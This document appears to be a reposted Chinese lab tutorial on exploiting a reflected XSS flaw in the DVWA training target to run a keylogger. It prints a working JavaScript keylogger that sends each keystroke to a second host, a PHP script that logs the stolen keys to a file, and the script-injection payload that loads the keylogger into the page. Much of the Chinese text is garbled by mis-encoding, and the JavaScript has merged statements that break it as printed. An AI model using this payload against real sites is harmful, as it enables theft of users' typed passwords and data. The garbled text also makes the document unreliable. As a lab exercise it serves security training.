利用XSS漏洞實(shí)現(xiàn)鍵盤(pán)記錄器

本實(shí)驗(yàn)以反射性的XSS漏洞為例
實(shí)驗(yàn)環(huán)境：dvwa靶機(jī)(ip:192.168.135.140)
kali linux(ip:192.168.135.138)

1.首先開(kāi)啟在kail上開(kāi)啟apache服務(wù)

/etc/init.d/apache2 start

在firefox地址欄輸入： http://192.168.135.138 或者 http://localhost 檢測(cè)apache是否開(kāi)啟,看見(jiàn)以下即可

2.在/var/www/html創(chuàng)建三個(gè)文件
(1)keylogger.js【遠(yuǎn)程js腳本文件】

document.onkeypress = function(evt) {evt = evt || window.eventkey = String.fromCharCode(evt.charCode)if (key) {var http = new XMLHttpRequest();var param = encodeURI(key)http.open("POST","http://192.168.135.138/keylogger.php",true);http.setRequestHeader("Content-type","application/x-www-form-urlencoded");http.send("key="+param);} }

(2)keylogger.php 【用于將鍵盤(pán)上的敲擊的記錄通過(guò)POST傳送到keylog.txt中】

<?php $key = $_POST['key']; $log = fopen("keylog.txt","a"); fwrite($log,$key); fclose($log); ?>

(3)keylog.txt 【空文件用于接收鍵盤(pán)的記錄】

2.XSS漏洞測(cè)試開(kāi)始
（1）在瀏覽器訪問(wèn)dvwa靶機(jī)并且登錄

（2）在輸入框中輸入以下代碼

<script src="http://192.168.135.138/keylogger.js"></script>

或者使用hackbar插件

（3）緊接著在這個(gè)頁(yè)面隨意敲擊鍵盤(pán)并查看keylog.txt是否有記錄

看見(jiàn)以上效果及實(shí)驗(yàn)成功。

總結(jié)

以上是生活随笔為你收集整理的利用XSS漏洞实现键盘记录器的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。